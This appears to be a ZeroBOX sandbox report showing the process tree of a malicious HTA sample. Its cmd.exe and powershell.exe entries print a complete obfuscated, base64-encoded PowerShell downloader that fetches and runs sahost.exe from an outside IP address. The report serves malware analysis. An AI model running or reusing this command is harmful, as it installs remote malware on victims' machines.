| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IEntworking.hta.html
2032
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2032 CREDAT:145409
  1780
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c PowERSheLl.EXe -ex BYPASS -NOp -w 1 -C deViCEcREdEnTiALDepLOyMENt ; Iex($(iex('[syStEm.teXT.EnCODINg]'+[chAR]0x3a+[Char]58+'utF8.GEtsTRIng([SYstEM.coNvErT]'+[cHAr]0x3A+[cHAr]0X3a+'froMbaSe64stRinG('+[chAR]0x22+'JGFGaXpNMzggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ2ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5TlNLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWERiU2hRZXosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY05FRlBDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRE9qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJsVGZxQiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ4ZlogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRhRml6TTM4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjE0Ny8zMy9zYWhvc3QuZXhlIiwiJEVuVjpBUFBEQVRBXHNhaG9zdC5leGUiLDAsMCk7U3RBUlQtU0xlRVAoMyk7c3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2Fob3N0LmV4ZSI='+[ChAr]0x22+'))')))"
    1700
    - powershell.exe PowERSheLl.EXe -ex BYPASS -NOp -w 1 -C deViCEcREdEnTiALDepLOyMENt ; Iex($(iex('[syStEm.teXT.EnCODINg]'+[chAR]0x3a+[Char]58+'utF8.GEtsTRIng([SYstEM.coNvErT]'+[cHAr]0x3A+[cHAr]0X3a+'froMbaSe64stRinG('+[chAR]0x22+'JGFGaXpNMzggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVtYkVyZEVmSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ2ssc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5TlNLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWERiU2hRZXosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY05FRlBDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRE9qKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInJsVGZxQiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1Fc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJ4ZlogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRhRml6TTM4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjQzLjE0Ny8zMy9zYWhvc3QuZXhlIiwiJEVuVjpBUFBEQVRBXHNhaG9zdC5leGUiLDAsMCk7U3RBUlQtU0xlRVAoMyk7c3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2Fob3N0LmV4ZSI='+[ChAr]0x22+'))')))"
      2552
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\nxrovjic.cmdline"
        1116
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES5E82.tmp" "c:\Users\test22\AppData\Local\Temp\CSC5E14.tmp"
        1620

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents